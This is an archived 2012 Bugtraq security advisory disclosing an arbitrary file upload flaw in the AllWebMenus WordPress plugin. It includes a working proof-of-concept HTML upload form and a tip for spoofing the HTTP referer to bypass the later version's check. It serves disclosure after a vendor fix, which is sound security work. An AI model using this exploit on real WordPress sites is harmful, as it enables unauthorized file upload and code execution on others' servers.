lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 22 Jan 2012 13:42:02 GMT
From: pavel@...an.com
To: bugtraq@...urityfocus.com
Subject: AllWebMenus < 1.1.9 WordPress Menu Plugin Arbitrary file upload

#Exploit Title: AllWebMenus WordPress Menu Plugin Arbitrary file upload
#Version:  < 1.1.9
#Date: 2012-01-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/allwebmenus-wordpress-menu-plugin/
#Official fix: This advisory is released after the vendor was contacted and fixed the issue promptly.
#Description:  Unauthorized users could upload arbitrary files to the vulnerable server, potentially executing commands

AllWebMenus WordPress Menu Plugin
<1.1.8  Remote File upload

On versions < 1.1.8 , lack of checks in script actions.php allowed malicious user to upload any file to the vulnerable server.
Create a file (For example, Wordpress_security.php , with this content <?php echo '6Scan to the rescue';  ?> )
Compress it with zip to awm.zip

Use this form to upload the php file to the server

<form action="http://192.168.0.197/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php" method=post enctype="multipart/form-data">
<input type="file" name="awm1" size=100>
<input type="hidden" name="AWM_menu_id" value="2134234">
<input type="hidden" name="theaction" value="zip_update">
<input type=submit>
</form>


Version 1.1.8 also checks the source referrer, so you have to use scripting language (or spoof it in another way) to set the HTTP_REFERER to 
"wp-admin/options-general.php?page=allwebmenus-wordpress-menu-plugin/allwebmenus-wordpress-menu.php"

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ